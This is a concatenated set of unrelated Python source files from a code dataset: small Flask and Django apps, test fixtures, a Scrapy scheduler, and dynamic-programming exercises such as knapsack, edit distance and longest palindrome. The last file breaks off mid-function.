print(\"-----------------------------------\")\r\n plotter(complete_data[correct_records[8]],0)\r\n plt.title(\"Good Records\")\r\n plotter(complete_data[incorrect_record_list[8]], 1)\r\n plt.title(\"Bad Records\")\r\n plt.show()\r\n'''\r\n\r\n\r\n# main()\r\n","sub_path":"data_cleaning_record.py","file_name":"data_cleaning_record.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"181555658","text":"import pytest\n\n\n@pytest.fixture(autouse=True)\ndef skip_testrpc_and_wait_for_mining_start(webu,\n wait_for_miner_start,\n skip_if_testrpc):\n skip_if_testrpc(webu)\n\n wait_for_miner_start(webu)\n\n assert webu.eth.mining\n assert webu.eth.hashrate\n assert webu.miner.hashrate\n","sub_path":"tests/core/txpool-module/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"261410505","text":"import os, signal, sys\ntry:\n import scrapy, pandas\n from apscheduler.schedulers.background import BackgroundScheduler\nexcept Exception as e:\n print(e)\n os.system('sudo -H python3.6 -m pip install -r requirements.txt')\n print('installing required packages, please reload script')\n sys.exit(1)\n\ndef callspider():\n cwd = os.getcwd()\n os.system(f'cd {cwd} && scrapy crawl YahooStocks')\n\ndef mainf():\n freq = input('script will run every (minutes, def = 3): ')\n if freq!='':\n freq = int(freq)\n else:\n freq = 3\n hm = input('input at what hour and minute script should stop, separated by whitespace (def 5:30): ')\n if hm!='':\n h,m = hm.split()\n h,m = int(h),int(m)\n else:\n h = 5\n m = 30\n cwd = os.getcwd()\n os.system(f'cd {cwd} && scrapy crawl YahooStocks')\n scheduler = BackgroundScheduler()\n def stopspider(*args):\n scheduler.shutdown()\n sys.exit(0)\n scheduler.add_job(stopspider,'cron', hour=h,minute=m)\n scheduler.add_job(callspider,'interval',minutes=freq)\n scheduler.start()\n def signal_handler(*args):\n stopspider()\n\n signal.signal(signal.SIGINT, signal_handler)\n print('press Ctrl+C to exit (clears scheduled job from crontab)')\n signal.pause()\n\n\nif __name__ == '__main__':\n mainf()\n\n","sub_path":"YahooStocks/YahooStocks/spiders/CronSchedule.py","file_name":"CronSchedule.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"20674175","text":"from django.contrib import admin\nfrom .models import Users, CategoriesCompanies, Companies\n\n\n# Register your models here.\n\n@admin.register(Users)\nclass UsersAdmin(admin.ModelAdmin):\n # поля, которые не нужно редактировать в админке\n readonly_fields = ('password', 'is_superuser', 'last_login', 'date_joined') # 'user_permissions', 'groups')\n\n # какие поля выводить в админке\n list_display = ('username', 'first_name', 'last_name', 'is_staff', 'is_active', 'phone', 'email')\n\n # по каким полям может осуществляться поиск в админке\n search_fields = ('username',\n 'first_name',\n 'last_name',\n 'patronymic',\n 'company',\n 'position',\n 'project',\n 'phone',\n 'email',)\n\n # укажем быстрые фильтры для фильтрации записей\n list_filter = ('is_staff', 'is_active', 'gender', 'company', 'city')\n\n # в админке поля формы можно группировать\n fieldsets = (\n ('Личные данные',\n {'fields': ('username', 'password', 'first_name', 'last_name', 'patronymic', 'gender', 'birthday')}),\n ('Контактные данные', {'fields': ('phone', 'email')}),\n ('Данные сотрудника',\n {'fields': ('is_staff', 'is_active', 'company', 'groups', 'position', 'project',)}),\n )\n\n\n@admin.register(CategoriesCompanies)\nclass CategoriesCompaniesAdmin(admin.ModelAdmin):\n list_display = ('name_category', 'description')\n search_fields = ('name_category', 'description',)\n\n\n@admin.register(Companies)\nclass CompaniesAdmin(admin.ModelAdmin):\n list_display = ('name_company', 'inn', 'get_category_company', 'city')\n search_fields = ('name_company',\n 'short_name',\n 'form_company',\n 'category_company',\n 'inn',\n 'city',\n 'address',\n 'phone',\n 'email',)\n # укажем быстрые фильтры для фильтрации записей\n list_filter = ('category_company', 'city')\n","sub_path":"bridges/authapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"244714260","text":"import json\nimport os\nfrom flask import request\n\nfrom huanmiAPI.db import client\nfrom huanmiAPI.models import Ad, Campaign, User\nfrom huanmiAPI.vault import vault\nfrom huanmiAPI import app\n\nFAILED = lambda e: json.dumps({'status': 1, 'reason': str(e)})\nUNAUTHORIZED = json.dumps({'status': 1, 'reason': 'Unauthorized'})\nUSER_ID_EXISTS = json.dumps({'status': 1, 'reason': 'User ID already exists.'})\nUSER_ID_MISMATCH = json.dumps({'status': 1, 'reason': 'User ID mismatched.'})\nCONSTANT_UPDATE = json.dumps({\n 'status': 1,\n 'reason': 'Constant data is not allowed to update.'\n})\nCANNOTPUBLISH = json.dumps({'status': 1, 'reason': 'Cannot post published ad.'})\nINCOMPLETE_AD = json.dumps({'status': 1, 'reason': 'Draft data is incomplete.'})\n\n_secret = vault['secret']\n\ndef _auth(secret):\n return secret == _secret\n\n@app.route(\"/user/add/\", methods=['POST'])\ndef createUser():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['id']\n source = request.form['source']\n try:\n user = User.User(client, userId, source, create = True)\n except User.UserIdExists:\n return USER_ID_EXISTS\n return json.dumps({'status': 0, 'data': user.get()})\n\n@app.route(\"/user/update/\", methods=['POST'])\ndef updateUser():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['id']\n key = request.form['key']\n value = request.form['value']\n isList = ('is-list' in request.form) and request.form['is-list']\n try:\n user = User.User(client, userId)\n user.update(key, value, isList = isList)\n except User.ConstantUpdatesForbidden:\n return CONSTANT_UPDATE\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': user.get()})\n\n@app.route(\"/user/view//\")\ndef viewUser(user_id):\n try:\n user = User.User(client, user_id)\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': user.get()})\n\n@app.route(\"/ad/add/\", methods=['POST'])\ndef createAd():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['user']\n try:\n ad = Ad.Ad(client, userId = userId)\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': ad.get()})\n\n@app.route(\"/ad/update/\", methods=['POST'])\ndef updateAd():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['user']\n adId = request.form['id']\n key = request.form['key']\n value = request.form['value']\n isList = ('is-list' in request.form) and request.form['is-list']\n try:\n ad = Ad.Ad(client, adId, userId, table = Ad.BUILD)\n ad.update(key, value, isList = isList)\n except Ad.UserNotMatch:\n return USER_ID_MISMATCH\n except User.ConstantUpdatesForbidden:\n return CONSTANT_UPDATE\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': ad.get()})\n\n@app.route('/ad/publish/', methods=['POST'])\ndef publishAd():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['user']\n adId = request.form['id']\n try:\n ad = Ad.Ad(client, adId, userId, table = Ad.BUILD)\n ad.build()\n except Ad.NotDraftAd:\n return CANNOTPUBLISH\n except Ad.NotCompleteAd:\n return INCOMPLETE_AD\n return json.dumps({'status': 0, 'data': ad.get()})\n\n@app.route('/ad/draft//')\n@app.route('/ad/view//')\ndef viewAd(ad_id):\n table = Ad.PRODUCT\n if request.path.split('/')[2] == 'draft':\n table = Ad.BUILD\n try:\n ad = Ad.Ad(client, ad_id, table = table)\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': json.dumps(ad.get())})\n\n@app.route('/campaign/add/', methods=['POST'])\ndef createCampaign():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['user']\n try:\n campaign = Campaign.Campaign(client, userId = userId)\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': campaign.get()})\n\n@app.route('/campaign/update/', methods=['POST'])\ndef updateCampaign():\n if not _auth(request.form['secret']):\n return UNAUTHORIZED\n userId = request.form['user']\n campaignId = request.form['id']\n key = request.form['key']\n value = request.form['value']\n isList = ('is-list' in request.form) and request.form['is-list']\n try:\n campaign = Campaign.Campaign(client, campaignId, userId)\n campaign.update(key, value, isList = isList)\n except User.ConstantUpdatesForbidden:\n return CONSTANT_UPDATE\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': campaign.get()})\n\n@app.route('/campaign/view//')\ndef viewCampaign(campaign_id):\n try:\n campaign = Campaign.Campaign(client, campaign_id)\n except Exception as e:\n return FAILED(e)\n return json.dumps({'status': 0, 'data': json.dumps(campaign.get())})\n","sub_path":"huanmiAPI/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"527539665","text":"#!venv/bin/python\nfrom flask import Flask, jsonify, abort, make_response, request, url_for\nfrom flask.ext.httpauth import HTTPBasicAuth\nimport time\nimport datetime\n\n\napp = Flask(__name__)\nauth = HTTPBasicAuth()\nts = time.time()\n\n# need to add setup.py and unit tests\n\n# datastore\norders = [\n {\n 'id': 44029472,\n 'date': u'',\n 'customer_id': 220300,\n 'customer_name': u'David',\n 'customer_address': u'Anchorage, Alaska'\n },\n {\n 'id': 440929472,\n 'date': u'',\n 'customer_id': 220300,\n 'customer_name': u'Jack',\n 'customer_address': u'New York, New York'\n },\n]\n\n@app.route('/')\ndef index():\n return \"Flask API!\" # should print out the endpoints to the user\n\n@app.route('/orders/api/v1.0/orders', methods=['GET'])\n@auth.login_required\ndef get_orders():\n return jsonify({'orders': [make_public_order(order) for order in orders]})\n\n@app.route('/orders/api/v1.0/order/', methods=['GET'])\n@auth.login_required\ndef get_order(order_id):\n order = [order for order in orders if order['id'] == order_id]\n if len(order) == 0:\n abort(404)\n return jsonify({'order': order[0]})\n\n@app.route('/orders/api/v1.0/orders', methods=['POST'])\n@auth.login_required\ndef create_order():\n if not request.json or not 'title' in request.json:\n abort(400)\n order = {\n 'id': orders[-1]['id'] + 1,\n 'date': datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S'),\n 'customer_id': order[-1]['customer_id'] + 1,\n 'customer_name': request.json.get('customer_name', \"\"),\n 'customer_address': request.json.get('customer_name', \"\")\n }\n orders.append(order)\n return jsonify({'order': make_public_order(order)}), 201\n\n@app.route('/orders/api/v1.0/order/', methods=['PUT'])\n@auth.login_required\ndef update_order(order_id):\n if not request.json or not order_id:\n abort(400)\n for order in (t for t in orders if t['id'] == order_id):\n order['customer_id'] = request.json.get('customer_id', order['customer_id'])\n order['customer_name'] = request.json.get('customer_name', order['customer_name'])\n order['customer_address'] = request.json.get('description', order['customer_address'])\n return jsonify({'order': make_public_order(order)})\n abort(404)\n\ndef make_public_order(order):\n new_order = {}\n for field in order:\n if field == 'id':\n new_order['uri'] = url_for('get_order', order_id = order['id'], _external = True)\n else:\n new_order[field] = order[field]\n return new_order\n\n# authentication\n@auth.get_password\ndef get_password(username):\n if username == 'test':\n return 'password'\n return None\n\n# error handling\n@auth.error_handler\ndef unauthorized():\n return make_response(jsonify({'error': 'Unauthorized access'}), 401)\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\nif __name__ == '__main__':\n app.run(debug=True)\n \n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"330818736","text":"#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: show_best_slave.py\n\n Description: Unit testing of show_best_slave in mysql_rep_failover.py.\n\n Usage:\n test/unit/mysql_rep_failover/show_best_slave.py\n\n Arguments:\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport sys\nimport os\n\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\n# Third-party\nimport mock\n\n# Local\nsys.path.append(os.getcwd())\nimport mysql_rep_failover\nimport lib.gen_libs as gen_libs\nimport version\n\n__version__ = version.__version__\n\n\nclass SlaveRep(object):\n\n \"\"\"Class: SlaveRep\n\n Description: Class stub holder for mysql_class.SlaveRep class.\n\n Methods:\n __init__\n\n \"\"\"\n\n def __init__(self, name, exe_gtidset, gtid_mode):\n\n \"\"\"Method: __init__\n\n Description: Class initialization.\n\n Arguments:\n (input) name\n (input) exe_gtidset\n (input) gtid_mode\n\n \"\"\"\n\n self.name = name\n self.exe_gtidset = exe_gtidset\n self.gtid_mode = gtid_mode\n\n\nclass UnitTest(unittest.TestCase):\n\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_one_slave\n test_default\n\n \"\"\"\n\n def setUp(self):\n\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n\n self.slave1 = SlaveRep(\"slave1\", \"20\", True)\n self.slave2 = SlaveRep(\"slave2\", \"10\", True)\n self.slave3 = SlaveRep(\"slave3\", \"15\", True)\n self.slavearray = []\n self.slavearray2 = []\n self.slavearray.append(self.slave1)\n self.slavearray.append(self.slave2)\n self.slavearray.append(self.slave3)\n self.slavearray2.append(self.slave1)\n self.slaveorder = []\n self.slaveorder2 = []\n slv0 = self.slavearray[0]\n slv1 = self.slavearray[1]\n slv2 = self.slavearray[2]\n self.slaveorder.append((slv1.exe_gtidset, slv1))\n self.slaveorder.append((slv2.exe_gtidset, slv2))\n self.slaveorder.append((slv0.exe_gtidset, slv0))\n self.slaveorder2.append((slv1.exe_gtidset, slv1))\n self.args_array = {}\n\n @mock.patch(\"mysql_rep_failover.order_slaves_on_gtid\")\n def test_one_slave(self, mock_order):\n\n \"\"\"Function: test_one_slave\n\n Description: Test with only one slave in list.\n\n Arguments:\n\n \"\"\"\n\n mock_order.return_value = self.slaveorder2\n\n with gen_libs.no_std_out():\n self.assertEqual(mysql_rep_failover.show_best_slave(\n self.slavearray2, self.args_array), (False, None))\n\n @mock.patch(\"mysql_rep_failover.order_slaves_on_gtid\")\n def test_default(self, mock_order):\n\n \"\"\"Function: test_show_best_slave\n\n Description: Test with default arguments only.\n\n Arguments:\n\n \"\"\"\n\n mock_order.return_value = self.slaveorder\n\n with gen_libs.no_std_out():\n self.assertEqual(mysql_rep_failover.show_best_slave(\n self.slavearray, self.args_array), (False, None))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/unit/mysql_rep_failover/show_best_slave.py","file_name":"show_best_slave.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"480773928","text":"# Exercise: while exercise 1\n# 5.0/5.0 points (graded)\n# ESTIMATED TIME TO COMPLETE: 5 minutes\n\n# In this problem you'll be given a chance to practice writing some while loops.\n\n# 1. Convert the following into code that uses a while loop.\n\n# print 2\n# prints 4\n# prints 6\n# prints 8\n# prints 10\n# prints Goodbye!\nn = 2;\nwhile(n <= 10):\n print(n)\n n += 2\nprint('Goodbye!')\n","sub_path":"week1_python_basics/core_elements_of_programs/while_exercise_1.py","file_name":"while_exercise_1.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"462378335","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\ndef check_subtree(t: Node, s: Node):\n if t is None and s is None:\n return True\n if t is None or s is None:\n return False\n return t.data == s.data and check_subtree(t.left, s.left) and check_subtree(t.right, s.right)\n\n\ndef is_subtree(t: Node, s: Node) -> bool:\n\n if s is None:\n return True\n if t is None:\n return False\n if check_subtree(t, s):\n return True\n return is_subtree(t.left, s) or is_subtree(t.right, s)\n\n\nif __name__ == \"__main__\":\n T = Node(26)\n T.right = Node(3)\n T.right.right = Node(3)\n T.left = Node(10)\n T.left.left = Node(4)\n T.left.left.right = Node(30)\n T.left.right = Node(6)\n\n \"\"\"\n creating second tree\n \"\"\"\n S = Node(10)\n S.right = Node(6)\n S.left = Node(4)\n S.left.right = Node(30)\n\n print(is_subtree(T, S))","sub_path":"subtree_of_tree.py","file_name":"subtree_of_tree.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"583122877","text":"import numpy\n# 0-1背包,n 个物品,背包最大承重 maxWeight\n# 每个物品的决策:放还是不放,上一个状态集合可以推导下一个集合\n# 这里有个重要的预判,即每一步骤的状态集合是有限的,不会超过总的重量限制\ndef getMax(items,n,maxWeight):\n # 维护一个二维数组,记录每一阶段的状态集合\n states = numpy.zeros((maxWeight,maxWeight+1),dtype=numpy.bool)\n states[0][0] = True\n if items[0] < maxWeight:\n states[0][items[0]] = True\n #! 状态转移,并且合并重复的状态\n for i in range(1,n): \n for j in range(maxWeight): # 不放入背包\n if states[i-1][j] == True: states[i][j] = True\n for j in range(maxWeight-items[i]+1): # 放入背包\n if states[i-1][j] == True: states[i][j+items[i]] = True\n # 在最后一个阶段的��态集合里,找到目标值\n for i in range(maxWeight,0,-1):\n if states[n-1][i] == True:\n print('The max weight is %s' %i)\n return i\n\n# getMax([2,3,4,5],4,8)\n\n# 一维数组解法\ndef getMaxPro(items,n,maxWeight):\n states = numpy.zeros(maxWeight+1,dtype=numpy.bool)\n states[0] = True\n if items[0] < maxWeight: states[items[0]] = True\n for i in range(1,n):\n for j in range(maxWeight-items[i],-1,-1): # 注意一维数组解法这里只能倒序,否则会重复计算\n if states[j] == True: states[j+items[i]] = True\n for k in range(maxWeight,-1,-1):\n if states[k] == True:\n print('The max weight pro is %s' %k)\n return k\n\n# getMaxPro([7,7,6,6,7,9],6,17)\n\n# 求具体的组合,回溯算法示例\n#! 后面会演示动态规划的倒推解法\ndef getCombines(items,n,maxWeight):\n theMax = getMaxPro(items,n,maxWeight)\n # i 控制递增,因为物品唯一,不能重复使用\n def recur(result,left,i):\n if left == 0: \n print(result)\n result = []\n return\n elif left < 0:\n return \n for j in range(i,n):\n newResult = result.copy() # 必须复制一份,尝试添加\n newResult.append(items[j]) \n recur(newResult,left-items[j],j+1)\n print('The combination by backtracking is :')\n recur([],theMax,0)\n\n# getCombines([1,2,3,6,7,4],6,10)\n\n# 倒推演示求单一组合\ndef getCombinesByDynamic(items,n,maxW):\n states = numpy.zeros((n,maxW+1),dtype=numpy.bool)\n states[0][0] = True\n if items[0] < maxW: states[0][items[0]] = True\n for i in range(1,n):\n for j in range(maxW + 1):\n if states[i-1][j] == True: states[i][j] = True\n for j in range(maxW-items[i]+1):\n if states[i-1][j] == True: states[i][j+items[i]] = True\n target = 0\n result = numpy.zeros(5,dtype=numpy.array)\n for j in range(maxW,0,-1):\n if states[n-1][j] == True: \n target = j\n break\n # 从目标值倒推,如果 states[i-1][target-items[i]] == True,说明物品 i 被选中了\n # 如果同时 states[i-1][target] == True,说明物品 i 可选可不选,要覆盖这种情况建议用回溯算法\n for i in range(n-1,0,-1):\n if target - items[i] > 0 and states[i-1][target-items[i]] == True:\n result.append(items[i])\n target -= items[i]\n # 上述倒推到第二行,第一行单独处理\n if target > 0: result.append(target)\n print('The combination is %s' %result)\n return result\n\n# getCombinesByDynamic([1,2,3,6,7,4],6,10)\n\n# 0-1背包升级版,加入物品价值\ndef getMaxValue(items,values,n,maxW):\n states = numpy.zeros((n,maxW+1),dtype=numpy.int8)\n states[0][0] = 0\n if items[0] < maxW: states[0][items[0]] = values[0]\n # 状态转移推导\n for i in range(1,n):\n for j in range(maxW+1):\n if states[i-1][j]: states[i][j] = states[i-1][j]\n for j in range(maxW-items[i]+1):\n # 注意,这里只能取同等重量下的最大价值,而不是被后来的组合覆盖\n if states[i-1][j] >= 0 and states[i-1][j] + values[i] > states[i][j+items[i]]: \n states[i][j+items[i]] = states[i-1][j] + values[i]\n maxV = 0\n for i in range(maxW,0,-1):\n if states[n-1][i] > maxV: maxV = states[n-1][i]\n print('The max value is %s' %maxV)\n return maxV\n\n# getMaxValue([1,2,3,6,7,4],[3,5,3,6,7,4],6,10)\n\n# 扩展,购物车取价格总和刚好超过 m 的值以及组合(薅羊毛)\n# 这里我们需要手动定义一个上限,比如 m + 100\ndef shoppingCart(values,n,targetValue):\n maxValue = targetValue + 100\n states = numpy.zeros((n,maxValue),dtype=numpy.bool)\n states[0][0] = True\n if values[0] < targetValue: states[0][values[0]] = True\n # 状态推导\n for i in range(1,n):\n for j in range(maxValue):\n if states[i-1][j] == True: states[i][j] = True\n for j in range(maxValue-values[i]):\n if states[i-1][j] == True: states[i][j+values[i]] = True\n # 找到第一个大于 targetValue 的金额\n result = 0\n for i in range(targetValue,maxValue+1):\n if states[n-1][i] == True:\n result = i\n break\n # 倒推求组合\n arr = []\n tempTotal = result\n for i in range(n-1,0,-1):\n if tempTotal-values[i] > 0 and states[i-1][tempTotal-values[i]] == True:\n arr.append(values[i])\n tempTotal -= values[i]\n if tempTotal > 0:\n arr.append(values[0])\n print('The combination is %s' %arr)\n print('The proper check bill is ¥%s' %result)\n return arr\n\n# shoppingCart([7,7,6,6,7,9],6,17)\n\n# 类杨辉三角,求最短路径\ndef getShortestRecur(i,j,mini,d,n,total):\n if i == n-1:\n if total < mini: mini = total\n print('miniDist is %s' %mini)\n return \n if i < n and j < n:\n getShortestRecur(i+1,j,mini,d,n,total+d[i+1][j])\n getShortestRecur(i+1,j+1,mini,d,n,total+d[i+1][j+1])\n \nd = [[3],[5,3],[6,2,1],[9,3,1,6]]\n# getShortestRecur(0,0,100,d,4,3)\n\n# 动态规划解法\ndef getShortestDynamic(d,n):\n states = [[100]*4]*4\n states[0][0] = d[0][0]\n # 状态推导,合并重复状态只取最小值\n for i in range(1,n):\n for j in range(i+1): # 选��边\n if states[i-1][j] + d[i][j] < states[i][j]:\n states[i][j] = states[i-1][j] + d[i][j]\n for j in range(i): # 选右边\n if states[i-1][j] + d[i][j+1] < states[i][j+1]:\n states[i][j+1] = states[i-1][j] + d[i][j+1]\n # 从最后一排找到目标\n mini = 100\n for i in range(n):\n if states[n-1][i] < mini:\n mini = states[n-1][i]\n print('The miniDist is %s' %mini)\n return mini\n\n# getShortestDynamic(d,4)\n\n# 有1、3、5三种硬币,数量不限\n# 使用最少的硬币找零钱\n# 回溯,暴力搜索\nleast = 9\ndef getCoinsRecur(result,left,coins):\n global least\n if left == 0:\n if len(result) < least: least = len(result)\n return\n if left < 0:\n return\n for v in coins:\n newResult = result.copy()\n newResult.append(v)\n getCoinsRecur(newResult,left-v,coins)\n\n# getCoinsRecur([],9,[1,3,5])\n# print(least)\n\n# 动态规划,利用状态转移方程,递归\nmini = 9\ncache = numpy.zeros((10,10),dtype=numpy.int8)\ndef getMiniCoinsDynamic(moneyLeft, count):\n global mini\n if moneyLeft == 0:\n if count < mini:\n mini = count\n return 1\n if moneyLeft < 0:\n return 0\n if cache[moneyLeft][count] > 0:\n return cache[moneyLeft][count]\n currentMini = min(getMiniCoinsDynamic(moneyLeft-1,count+1), getMiniCoinsDynamic(moneyLeft-3,count+1), getMiniCoinsDynamic(moneyLeft-5,count+1)) + 1\n cache[moneyLeft][count] = currentMini\n return currentMini\n\n# getMiniCoinsDynamic(9,0)\n# print('The miniCoins is %s' %mini)\n\n# 借助上述结果,顺便求具体的组合\n\ndef getMiniCoins(moneyLeft, result):\n global mini\n if moneyLeft == 0:\n if len(result) == mini:\n print(result)\n return \n if moneyLeft < 0:\n return \n if len(result) > mini:\n return\n result1 = result.copy()\n result3 = result.copy()\n result5 = result.copy()\n result1.append(1)\n result3.append(3)\n result5.append(5)\n getMiniCoins(moneyLeft-1,result1)\n getMiniCoins(moneyLeft-3,result3)\n getMiniCoins(moneyLeft-5,result5)\n\n# getMiniCoins(9,[])\n\n# 编辑距离 - 莱文斯坦距离:增、删、改都会导致距离+1,距离越小越相似\n# 利用 dictionary 缓存\nmini = 100\na = 'mitctttmuaaa'\nb = 'mttttacnuaaa'\nmatrix = {}\ndef getLwstDP(i,j,editest):\n global mini\n if i == 0 or j == 0:\n if j > 0: editest += j\n if i > 0: editest += i\n if editest < mini: \n mini = editest\n return editest\n if 's'+str(i)+str(j)+str(editest) in matrix:\n return matrix['s'+str(i)+str(j)+str(editest)]\n if a[i] == b[j]:\n dist = min(getLwstDP(i-1,j,editest+1),getLwstDP(i,j-1,editest+1),getLwstDP(i-1,j-1,editest))\n else:\n dist = min(getLwstDP(i-1,j,editest+1),getLwstDP(i,j-1,editest+1),getLwstDP(i-1,j-1,editest+1))\n matrix['s'+str(i)+str(j)+str(editest)] = dist\n return dist\n\n# getLwstDP(len(a)-1,len(b)-1,0)\n# print('lwstDP is %s' %mini)\n\n# 编辑距离 - 最长公共子串:增、删都会导致长度-1,越长越相似\nmaxLcs = 0\ndef getMaxLcs(i,j,longest):\n global maxLcs\n if i < 0 or j < 0:\n if longest > maxLcs:\n maxLcs = longest\n return longest\n if 's'+str(i)+str(j)+str(longest) in matrix:\n return matrix['s'+str(i)+str(j)+str(longest)]\n if a[i] == b[j]:\n current = max(getMaxLcs(i-1,j,longest),getMaxLcs(i,j-1,longest),getMaxLcs(i-1,j-1,longest+1))\n else:\n current = max(getMaxLcs(i-1,j,longest),getMaxLcs(i,j-1,longest),getMaxLcs(i-1,j-1,longest))\n matrix['s'+str(i)+str(j)+str(longest)] = current\n return current\n\ngetMaxLcs(len(a)-1,len(b)-1,0)\nprint('maxLcs is %s' %maxLcs)\n\n# n个不同的数字,求最长的递增子序列长度\n# 问题需要转换为:分别求出以每个元素结尾的最长子序列长度,取它们之中的最大值\narr = [3,5,1,2]\nmaxL = 0\ncache = [0] * 9\ndef getMaxAscendLen(i):\n global maxL\n if i == 0:\n return 1\n if cache[i] > 0:\n return cache[i]\n result = 0\n for j in range(i-1,-1,-1):\n lastResult = getMaxAscendLen(j)\n if arr[j] < arr[i]:\n result = max(lastResult + 1, result)\n else:\n # 左边元素比较大,那么以 i 元素结尾的最长子序列就只有它自己\n result = 1\n if result > maxL:\n maxL = result\n cache[i] = result\n return result\n\n# getMaxAscendLen(3)\n# print(maxL)\n\ndef getMaxAscendLenByLoop(arr):\n length = len(arr)\n maxLen = 1\n states = [1] * length\n for i in range(1,length):\n for j in range(0,i):\n if arr[j] < arr[i]:\n states[i] = max(states[j]+1,states[i])\n else:\n continue\n if states[i] > maxLen:\n maxLen = states[i]\n print(maxLen)\n return maxLen\n\n# getMaxAscendLenByLoop([3,5,1,2])\n\nimport math\n\ndef isPalindrome(s):\n length = len(s)\n if length == 1:\n return True\n middle = math.floor(length/2)\n i = 0\n j = length - 1\n while i < middle and j >= middle:\n if s[i] != s[j]:\n return False\n i += 1\n j -= 1\n return True\n\n# print(isPalindrome('abba'))\n\n# 最长回文子串\n# 解法一:从两边顶点找起,DP 转移方程为 P(i,j) = True if P(i+1,j-1) == True and S[i] == S[j] else False\n\ndef longestPalindrome(s):\n states = {}\n length = len(s)\n if length <= 1:\n return s\n\n def isFullfilled(i,j):\n if i == j:\n return True\n if j == i+1 and s[i] == s[j]:\n return True\n if j == i+1 and s[i] != s[j]:\n return False\n if 'k' + str(i) + 's' + str(j) in states:\n return states['k' + str(i) + 's' + str(j)]\n currentStatus = isFullfilled(i+1,j-1) == True and s[i] == s[j]\n states['k' + str(i) + 's' + str(j)] = currentStatus\n return currentStatus\n \n maxLen = -1\n result = ''\n for i in range(length):\n for j in range(length-1,i-1,-1):\n if isFullfilled(i,j) == True and j - i > maxLen:\n maxLen = j - i\n result = s[i:j+1]\n return result\n\ntest = \"slvafhpfjpbqbpcuwxuexavyrtymfydcnvvbvdoitsvumbsvoayefsnusoqmlvatmfzgwlhxtkhdnlmqmyjztlytoxontggyytcezredlrrimcbkyzkrdeshpyyuolsasyyvxfjyjzqksyxtlenaujqcogpqmrbwqbiaweacvkcdxyecairvvhngzdaujypapbhctaoxnjmwhqdzsvpyixyrozyaldmcyizilrmmmvnjbyhlwvpqhnnbausoyoglvogmkrkzppvexiovlxtmustooahwviluumftwnzfbxxrvijjyfybvfnwpjjgdudnyjwoxavlyiarjydlkywmgjqeelrohrqjeflmdyzkqnbqnpaewjdfmdyoazlznzthiuorocncwjrocfpzvkcmxdopisxtatzcpquxyxrdptgxlhlrnwgvee\"\n# print(longestPalindrome(test))\n\n# 解法二:循环遍历,找出每个元素为中心(或伪中心)时的最长回形子串,取其中最长的,也属于 DP 范畴\n\n# 辅助函数,检查子串长度\ndef check(s,i,j):\n left = i\n right = j\n while left >=0 and right < len(s) and s[left] == s[right]:\n left -= 1\n right += 1\n return right - left - 1\n\ndef longestPalindromePlus(s):\n length = len(s)\n start = 0\n end = 0\n for i in range(length):\n # 检查最长子串\n len1 = check(s,i,i)\n len2 = check(s,i,i+1)\n maxLen = max(len1,len2)\n if maxLen > end - start:\n start = i - math.floor((maxLen-1)/2)\n end = i + math.floor(maxLen/2)\n return s[start:end+1]\n\nprint(longestPalindromePlus(test))\n\n# 给定一个数组,求连续子串的最大和\ndef maxSubArray0(nums):\n # 正常应该是 DP 解法,这里使用特殊的累加解法\n # 当前面之和为正数,累加到当前值,最后求数组最大值\n for i in range(1,len(nums)):\n if nums[i-1] > 0:\n nums[i] += nums[i-1]\n return max(nums)\n\n# TODO 给定一个整数数组,求组成最大和的连续子串\n# 思路:从左往右遍历一遍,当前和如果小于0则舍弃\ndef maxSubArray(nums):\n resultList = [nums[0]]\n currentSum = 0\n for i in nums:\n copyList = resultList.copy()\n if currentSum >= 0:\n currentSum += i\n copyList.append(i)\n else:\n currentSum = i\n copyList = [i]\n if sum(copyList) > sum(resultList):\n resultList = 